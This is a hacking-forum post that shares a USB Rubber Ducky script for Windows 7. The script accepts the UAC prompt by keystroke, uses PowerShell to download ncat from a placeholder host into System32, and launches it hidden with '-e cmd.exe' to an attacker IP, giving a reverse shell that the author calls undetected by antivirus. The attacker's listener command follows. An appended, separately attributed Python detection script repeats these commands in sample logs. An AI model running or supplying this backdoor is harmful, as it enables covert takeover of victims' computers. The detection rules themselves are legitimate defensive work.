[Source] Undetected windows backdoor shell w/ Uac (Win7)


Grimsoul


Just picked up my rubber ducky and thought I'd contribute a bit. (First post btw, Hi!)

So we all know that netcat gets picked up by most anti-virus (a ratio of about 23/53), which makes using it as a backdoor slightly challenging.
After doing some reading, I figured out that ncat (by nmap), a modernized version of ncat, only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs.
So here is a (relatively) undetected backdoor to any Windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.

For this attack, we download a copy of ncat on the victim's machine and run it silently.

You can pick up a portable exe of ncat straight from the developer's website (1.5 MB) here.

ncat, unlike netcat, doesn't run in the background (it requires a cmd window to be open to keep the connection alive), so I used some crafty powershell arguments to force it into the background.

The rest is explained in the comments.

You can compare the AV results between netcat and ncat here:

VirusTotal ncat results (picked up by Norton though, sucks I know)

VirusTotal netcat results

Please feel free to adapt this for your own tailored needs, be it persistence, no-download (twin-duck) or hidden cmd window.

- GrimsouL

REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014

REM //This delay was required on my PC before attempting to get the start menu; may not be required on yours/target.
DELAY 1000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
REM //This delay is long because on my machine right clicking certain things takes a long time (many menu options); adjust as needed.
DELAY 1000
STRING a
DELAY 200
REM //This ENTER is required on my PC. I've seen a lot of scripts where this is omitted, but the 'a' above only selects 'Run as administrator' on my machine, hence we need an ENTER to actually 'click' it.
ENTER
REM //This delay may need to be adjusted depending on the machine. Sometimes takes long due to background dimming.
DELAY 700
REM //UAC prompt: LEFTARROW moves focus from the default 'No' to 'Yes', ENTER confirms.
LEFTARROW
DELAY 400
ENTER
DELAY 700
REM //Simple powershell to download ncat portable. You can see it has a .txt extension because most hosters don't allow .exe files, so we change the extension of ncat to .txt, upload it, then rename it back to .exe after download.
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe')
ENTER
REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/target's connection speed. (ncat = 1.58MB)
DELAY 10000
ENTER
REM //Where the magic happens: we run the downloaded ncat exe. Since ncat doesn't run in the background, we use a powershell argument to make it so. The file name here must match the one used in the download above.
STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\yourPayload.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe'
ENTER
REM //We exit our powershell; however ncat runs silently, leaving us with a clean getaway.
STRING exit
ENTER

To run our listener on the attacker machine

ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v
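For defenders, here is an added example (my own, not part of GrimsouL's post) of host-side detection for the three traits this payload leaves in process-creation telemetry: a PowerShell WebClient download dropping an .exe into System32, Start-Process with -WindowStyle hidden, and a renamed binary started with "-e cmd.exe". The records are constructed Sysmon-style samples; the rule names, the host example.invalid and the address 192.0.2.10 are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (Sysmon Event ID 1 style), not
# real logs; they mimic the sequence the ducky script above produces.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell (new-object System.Net.WebClient).DownloadFile("
                    r"'http://example.invalid/yourPayload.txt','C:\Windows\System32\yourPayload.exe')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell Start-Process -WindowStyle hidden -FilePath C:\Windows\System32\yourPayload.exe -ArgumentList '192.0.2.10 4444 -e cmd.exe'"},
    {"Image": r"C:\Windows\System32\yourPayload.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\System32\yourPayload.exe 192.0.2.10 4444 -e cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Process"},   # benign control record
]

# Each rule: (name, compiled regex over CommandLine). The rules key on the
# behaviour of the posted payload, not on the tool name, since the binary is
# renamed before it is dropped.
RULES = [
    ("webclient_download_to_system32",
     re.compile(r"DownloadFile\(.*System32\\[^']+\.exe", re.I)),
    ("hidden_start_process",
     re.compile(r"Start-Process\b.*-WindowStyle\s+hidden", re.I)),
    ("exec_flag_shell",   # nc/ncat style "-e cmd.exe" argument
     re.compile(r"(^|\s)-e\s+cmd(\.exe)?\b", re.I)),
]

def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules whose regex matches the command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, pat in RULES if pat.search(cmd)]

def scan(events: List[Dict[str, str]]):
    """Return (event index, matched rule names) for every suspicious event."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := match_rules(ev))]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], hits)
```

The control record matches nothing, while the drop, the hidden launch and the child process each trip at least one rule; chaining the three on one host within a short window is the higher-confidence alert.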
